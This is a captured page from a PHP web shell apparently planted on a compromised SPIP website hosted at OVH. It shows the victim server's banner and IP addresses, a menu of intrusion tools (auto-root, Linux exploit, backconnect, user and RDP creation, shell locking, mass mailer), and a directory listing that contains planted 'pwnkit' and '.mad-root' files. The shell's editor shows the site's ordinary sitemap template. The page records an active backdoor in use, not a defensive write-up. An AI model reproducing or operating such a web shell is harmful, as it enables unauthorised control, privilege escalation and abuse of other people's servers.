Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
squelettes-dist /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwx---r-x
formulaires
[ DIR ]
drwx---r-x
icon
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
inclure
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
modeles
[ DIR ]
drwx---r-x
polices
[ DIR ]
drwx---r-x
.editorconfig
300
B
-rw----r--
.gitattributes
85
B
-rw----r--
.gitignore
39
B
-rw----r--
.mad-root
0
B
-rw-r--r--
404.html
1.85
KB
-rw----r--
CHANGELOG.md
1.45
KB
-rw----r--
article.html
3.3
KB
-rw----r--
auteur.html
2.55
KB
-rw----r--
backend-breves.html
3.03
KB
-rw----r--
backend.html
1.47
KB
-rw----r--
backend.xslt.html
3.47
KB
-rw----r--
breve.html
3.02
KB
-rw----r--
calendrier.html
739
B
-rw----r--
composer.json
328
B
-rw----r--
contact.html
1.21
KB
-rw----r--
favicon.ico.html
97
B
-rw----r--
forum.html
2.18
KB
-rw----r--
ical.html
1012
B
-rw----r--
identifiants.html
1.31
KB
-rw----r--
inc-rss-item.html
2.28
KB
-rw----r--
mot.html
4.65
KB
-rw----r--
nouveautes.html
868
B
-rw----r--
paquet.xml
316
B
-rw----r--
plan.html
1.14
KB
-rw----r--
puce.gif
83
B
-rw----r--
puce_rtl.gif
84
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
recherche.html
3.78
KB
-rw----r--
robots.txt.html
536
B
-rw----r--
rss_forum_article.html
1.39
KB
-rw----r--
rss_forum_breve.html
1.35
KB
-rw----r--
rss_forum_rubrique.html
1.37
KB
-rw----r--
rss_forum_syndic.html
1.36
KB
-rw----r--
rss_forum_thread.html
1.38
KB
-rw----r--
rubrique.html
5.33
KB
-rw----r--
site.html
3.39
KB
-rw----r--
sitemap.xml.html
1.93
KB
-rw----r--
sommaire.html
2.24
KB
-rw----r--
spip.ico
4.19
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sitemap.xml.html
[(#REM) Exemple tres simple de sitemap.xml accessible via URL_SITE_SPIP/sitemap.xml (copier htaccess.txt en .htaccess pour en beneficier) Ce sitemap affiche la liste des rubriques, breves et articles, en se limitant a 1000 rubriques, 1000 breves et 2000 articles pour des raisons de performances. Duree de reindexation et priorite ne sont pas precisees, sauf pour l'accueil. Mais si date_modif est recente (1 jour) on l'indique, pour que ce soit reindexe en priorite un critère annee permet de lister les articles d'une année pour contourner la limite de 2000 items du sitemap general sitemap.xml?annee=1981 (On pose un cache a zero pour echapper au test _IS_BOT) ]#HTTP_HEADER{Content-Type: text/xml; charset=utf-8} <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml"> [(#REM) Accueil] <url> <loc>#URL_SITE_SPIP/</loc> <changefreq>hourly</changefreq> </url> [(#REM) Rubriques] <BOUCLE_r(RUBRIQUES){!par date}{0,1000}{si #ENV{annee}|non}> <url> [<loc>(#URL_RUBRIQUE|url_absolue)</loc>] </url> </BOUCLE_r> [(#REM) Articles] [(#SET{recent,[(#VAL{Y-m-d H:i:s}|date{#VAL{"-1 day"}|strtotime})]})] <BOUCLE_a(ARTICLES){annee?}{!par date_modif}{!par date}{0,2000}> <url> [<loc>(#URL_ARTICLE|url_absolue)</loc>] <BOUCLE_a_trad(ARTICLES){traduction}> <xhtml:link rel="alternate" hreflang="[(#LANG)]" href="[(#URL_ARTICLE|url_absolue)]" /> </BOUCLE_a_trad> [(#DATE_MODIF**|>{#GET{recent}} |?{[<lastmod>(#DATE_MODIF**|date_iso)</lastmod>]})] </url> </BOUCLE_a> [(#REM) Breves] <BOUCLE_b(BREVES?){annee?}{!par date}{0,1000}>[ <url><loc>(#URL_BREVE|url_absolue)</loc></url>]</BOUCLE_b> [(#REM) Extensions de sitemap par des plugins] <BOUCLE_objets(DATA){source table,#REM|lister_tables_objets_sql}{si #ENV{annee}|non}> #SET{fond,#VAL{sitemap-}|concat{#VALEUR{table_objet}}} [(#GET{fond}|trouver_fond|oui)#INCLURE*{fond=#GET{fond}}] </BOUCLE_objets> </urlset>
Close